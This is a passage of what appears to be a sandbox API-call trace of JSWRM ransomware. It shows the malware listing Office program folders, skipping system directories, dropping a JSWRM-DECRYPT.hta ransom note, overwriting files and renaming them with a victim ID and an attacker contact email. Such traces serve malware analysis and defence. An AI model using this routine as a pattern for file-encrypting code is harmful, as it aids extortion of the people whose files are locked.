lstrcmpiW (lpString1="PTXT9.DLL", lpString2="system volume information") returned -1 [0139.853] lstrcmpiW (lpString1="PTXT9.DLL", lpString2="msocache") returned 1 [0139.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0139.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PTXT9.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0139.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PTXT9.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PTXT9.DLL", lpUsedDefaultChar=0x0) returned 9 [0139.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0139.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0139.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PTXT9.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0139.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PTXT9.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PTXT9.DLL", lpUsedDefaultChar=0x0) returned 9 [0139.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0139.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0139.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0139.853] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x246bb96e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x246bb96e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PUBBA", cAlternateFileName="")) returned 1 [0139.853] lstrcmpiW (lpString1="PUBBA", lpString2=".") returned 1 [0139.853] lstrcmpiW (lpString1="PUBBA", lpString2="..") returned 1 [0139.853] lstrcmpiW (lpString1="PUBBA", lpString2="...") returned 1 [0139.853] lstrcmpiW (lpString1="PUBBA", lpString2="windows") returned -1 [0139.853] lstrcmpiW (lpString1="PUBBA", lpString2="recovery") returned -1 [0139.853] lstrcmpiW (lpString1="PUBBA", lpString2="perflogs") returned 1 [0139.853] lstrcmpiW (lpString1="PUBBA", lpString2="documents and settings") returned 1 [0139.853] lstrcmpiW (lpString1="PUBBA", lpString2="$RECYCLE.BIN") returned 1 [0139.853] lstrcmpiW (lpString1="PUBBA", lpString2="system volume information") returned -1 [0139.853] lstrcmpiW (lpString1="PUBBA", lpString2="msocache") returned 1 [0139.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0139.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0139.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0139.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0139.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b510 [0139.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0139.853] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\jswrm-decrypt.hta")) returned 0xffffffff [0139.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0139.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0139.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x27b348 [0139.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0139.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27d118 [0139.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0139.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0139.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b2b8 [0139.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0139.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0139.858] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.858] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0139.859] CloseHandle (hObject=0x45c) returned 1 [0139.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0139.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27d118 | out: hHeap=0x1e0000) returned 1 [0139.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0139.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0139.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0139.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0139.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0139.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b510 [0139.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0139.860] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\jswrm-decrypt.hta")) returned 0x20 [0139.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0139.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0139.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0139.860] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x246bb96e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4a04f2da, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0139.860] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0139.860] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x246bb96e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4a04f2da, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.860] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0139.860] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0139.860] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a04f2da, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4a04f2da, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4a04f2da, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0139.860] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0139.860] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0139.860] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0139.860] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0139.860] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0139.860] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0139.860] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0139.860] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0139.860] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0139.860] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0139.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0139.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0139.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0139.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0139.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0139.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0139.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0139.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0139.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0139.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0139.861] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2169a085, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2169a085, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xca60, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB10.BDR", cAlternateFileName="")) returned 1 [0139.861] lstrcmpiW (lpString1="MSPUB10.BDR", lpString2=".") returned 1 [0139.861] lstrcmpiW (lpString1="MSPUB10.BDR", lpString2="..") returned 1 [0139.861] lstrcmpiW (lpString1="MSPUB10.BDR", lpString2="...") returned 1 [0139.861] lstrcmpiW (lpString1="MSPUB10.BDR", lpString2="windows") returned -1 [0139.861] lstrcmpiW (lpString1="MSPUB10.BDR", lpString2="recovery") returned -1 [0139.861] lstrcmpiW (lpString1="MSPUB10.BDR", lpString2="perflogs") returned -1 [0139.861] lstrcmpiW (lpString1="MSPUB10.BDR", lpString2="documents and settings") returned 1 [0139.861] lstrcmpiW (lpString1="MSPUB10.BDR", lpString2="$RECYCLE.BIN") returned 1 [0139.861] lstrcmpiW (lpString1="MSPUB10.BDR", lpString2="system volume information") returned -1 [0139.861] lstrcmpiW (lpString1="MSPUB10.BDR", lpString2="msocache") returned 1 [0139.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0139.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB10.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB10.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB10.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0139.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0139.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB10.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB10.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB10.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0139.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB10.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub10.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.863] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=51808) returned 1 [0139.863] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.863] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xca60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xca60, lpOverlapped=0x0) returned 1 [0139.868] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.868] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xca60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xca60, lpOverlapped=0x0) returned 1 [0139.869] CloseHandle (hObject=0x238) returned 1 [0139.869] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB10.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub10.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB10.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub10.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.870] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x216c02db, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x216c02db, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x69e0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB11.BDR", cAlternateFileName="")) returned 1 [0139.870] lstrcmpiW (lpString1="MSPUB11.BDR", lpString2=".") returned 1 [0139.870] lstrcmpiW (lpString1="MSPUB11.BDR", lpString2="..") returned 1 [0139.870] lstrcmpiW (lpString1="MSPUB11.BDR", lpString2="...") returned 1 [0139.870] lstrcmpiW (lpString1="MSPUB11.BDR", lpString2="windows") returned -1 [0139.870] lstrcmpiW (lpString1="MSPUB11.BDR", lpString2="recovery") returned -1 [0139.870] lstrcmpiW (lpString1="MSPUB11.BDR", lpString2="perflogs") returned -1 [0139.870] lstrcmpiW (lpString1="MSPUB11.BDR", lpString2="documents and settings") returned 1 [0139.870] lstrcmpiW (lpString1="MSPUB11.BDR", lpString2="$RECYCLE.BIN") returned 1 [0139.870] lstrcmpiW (lpString1="MSPUB11.BDR", lpString2="system volume information") returned -1 [0139.870] lstrcmpiW (lpString1="MSPUB11.BDR", lpString2="msocache") returned 1 [0139.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB11.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB11.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB11.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB11.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB11.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB11.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB11.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub11.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.871] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27104) returned 1 [0139.871] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.871] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x69e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x69e0, lpOverlapped=0x0) returned 1 [0139.875] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.875] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x69e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x69e0, lpOverlapped=0x0) returned 1 [0139.875] CloseHandle (hObject=0x238) returned 1 [0139.875] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB11.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub11.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBBA\\MSPUB11.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubba\\mspub11.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.877] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2169a085, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2169a085, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x216c02db, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf254, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSPUB1A.BDR", cAlternateFileName="")) returned 1 [0139.877] lstrcmpiW (lpString1="MSPUB1A.BDR", lpString2=".") returned 1 [0139.877] lstrcmpiW (lpString1="MSPUB1A.BDR", lpString2="..") returned 1 [0139.877] lstrcmpiW (lpString1="MSPUB1A.BDR", lpString2="...") returned 1 [0139.877] lstrcmpiW (lpString1="MSPUB1A.BDR", lpString2="windows") returned -1 [0139.877] lstrcmpiW (lpString1="MSPUB1A.BDR", lpString2="recovery") returned -1 [0139.877] lstrcmpiW (lpString1="MSPUB1A.BDR", lpString2="perflogs") returned -1 [0139.877] lstrcmpiW (lpString1="MSPUB1A.BDR", lpString2="documents and settings") returned 1 [0139.877] lstrcmpiW (lpString1="MSPUB1A.BDR", lpString2="$RECYCLE.BIN") returned 1 [0139.877] lstrcmpiW (lpString1="MSPUB1A.BDR", lpString2="system volume information") returned -1 [0139.877] lstrcmpiW (lpString1="MSPUB1A.BDR", lpString2="msocache") returned 1 [0139.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB1A.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB1A.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB1A.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB1A.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB1A.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB1A.BDR", lpUsedDefaultChar=0x0) returned 11 [0139.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.877] CreateFileW (lpFileName="C:\\Program 